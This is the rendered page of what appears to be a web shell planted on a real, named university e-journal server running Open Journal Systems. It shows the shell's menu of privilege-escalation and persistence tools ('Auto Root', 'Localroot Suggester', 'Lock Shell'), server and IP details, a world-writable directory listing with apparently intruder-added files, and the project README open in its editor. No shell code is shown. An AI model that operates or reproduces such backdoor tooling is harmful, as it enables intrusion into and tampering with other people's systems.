Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 3.147.73.112
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
localhost /
ejournal /
Delete
Unzip
Name
Size
Permission
Date
Action
.git
[ DIR ]
drwxrwxrwx
2023-03-28 17:48
.well-known
[ DIR ]
drwxrwxrwx
2023-03-28 17:48
__MACOSX
[ DIR ]
drwxrwxrwx
2023-03-28 17:48
api
[ DIR ]
drwxrwxrwx
2023-03-28 17:49
cache
[ DIR ]
drwxrwxrwx
2024-06-20 15:47
cgi-bin
[ DIR ]
drwxrwxrwx
2023-03-28 17:49
classes
[ DIR ]
drwxrwxrwx
2024-09-18 09:29
controllers
[ DIR ]
drwxrwxrwx
2023-03-28 17:49
data
[ DIR ]
drwxrwxrwx
2024-07-14 19:52
dbscripts
[ DIR ]
drwxrwxrwx
2023-03-28 17:49
docs
[ DIR ]
drwxrwxrwx
2023-03-28 17:49
js
[ DIR ]
drwxrwxrwx
2023-03-28 17:49
lib
[ DIR ]
drwxrwxrwx
2024-08-21 20:14
locale
[ DIR ]
drwxrwxrwx
2023-03-28 17:50
pages
[ DIR ]
drwxrwxrwx
2023-03-28 17:50
plugins
[ DIR ]
drwxrwxrwx
2023-03-28 17:50
public
[ DIR ]
drwxrwxrwx
2024-07-15 08:16
registry
[ DIR ]
drwxrwxrwx
2023-03-28 17:50
schemas
[ DIR ]
drwxrwxrwx
2023-03-28 17:50
styles
[ DIR ]
drwxrwxrwx
2023-03-28 17:48
templates
[ DIR ]
drwxrwxrwx
2023-03-28 17:48
tools
[ DIR ]
drwxrwxrwx
2023-03-28 17:48
.DS_Store
10
KB
-rw-rw-rw-
2019-12-16 17:05
.ftpquota
16
B
-rw-rw-rw-
2022-09-14 02:13
.gitignore
748
B
-rw-rw-rw-
2019-12-17 21:36
.htaccess
98
B
-rw-rw-rw-
2022-05-17 19:16
README.md
2.21
KB
-rw-rw-rw-
2020-07-21 11:00
config.TEMPLATE.inc.php
16.11
KB
-rw-rw-rw-
2020-07-21 11:00
config.inc.php
16.31
KB
-rw-rw-rw-
2024-06-06 09:33
cypress.json
734
B
-rw-rw-rw-
2020-07-21 11:00
ejournal.zip
121.7
MB
-rw-rw-rw-
2024-06-20 16:02
error_log
167.19
KB
-rw-rw-rw-
2022-09-28 03:17
favicon.ico
1.12
KB
-rw-rw-rw-
2020-07-21 11:00
googlea1919ab817f4ec66.html
53
B
-rw-rw-rw-
2023-03-28 19:26
index.php
2.9
KB
-rw-rw-rw-
2020-07-21 11:00
kek.htm
2.08
KB
-rw-rw-rw-
2024-08-19 11:41
kek.txt
2.08
KB
-rw-rw-rw-
2024-08-19 11:40
naila.txt
29
B
-rw-rw-rw-
2024-03-17 01:52
package-lock.json
383.44
KB
-rw-rw-rw-
2019-12-07 08:27
robots.txt
32
B
-rw-rw-rw-
2020-07-21 11:00
s
0
B
-rw-rw-rw-
2024-09-12 18:48
web.config
993
B
-rw-rw-rw-
2022-11-16 20:57
Save
Rename
# Open Journal Systems > Open Journal Systems (OJS) has been developed by the Public Knowledge Project. For general information about OJS and other open research systems, visit the [PKP web site][pkp]. [](https://travis-ci.org/pkp/ojs) ## Documentation You will find detailed guides in [docs](docs) folder. ## Using Git development source Checkout submodules and copy default configuration : git submodule update --init --recursive cp config.TEMPLATE.inc.php config.inc.php Install or update dependencies via Composer (https://getcomposer.org/): composer --working-dir=lib/pkp update composer --working-dir=plugins/paymethod/paypal update composer --working-dir=plugins/generic/citationStyleLanguage update Install or update dependencies via [NPM](https://www.npmjs.com/): # install [nodejs](https://nodejs.org/en/) if you don't already have it npm install npm run build If your PHP version supports built-in development server : php -S localhost:8000 See the [Documentation Hub][doc-hub] for a more complete development guide. ## Running Tests We recommend using [Travis](https://travis-ci.org/) for continuous-integration based testing. Review the Travis configuration file (`.travis.yml`) as a reference for running the test locally, should you choose to do so. The tests include an integration test suite that builds a data environment from scratch, including the installation process. (This is the `-b` flag to the test script `lib/pkp/tools/runAllTests.sh`; this is also executed in the Travis environment.) ## Bugs / Issues See https://github.com/pkp/pkp-lib/#issues for information on reporting issues. ## License This software is released under the the [GNU General Public License][gpl-licence]. See the file [COPYING][gpl-licence] included with this distribution for the terms of this license. Third parties are welcome to modify and redistribute OJS in entirety or parts according to the terms of this license. PKP also welcomes patches for improvements or bug fixes to the software. [pkp]: https://pkp.sfu.ca/ [readme]: docs/README.md [doc-hub]: https://docs.pkp.sfu.ca/ [php-unit]: https://phpunit.de/ [gpl-licence]: docs/COPYING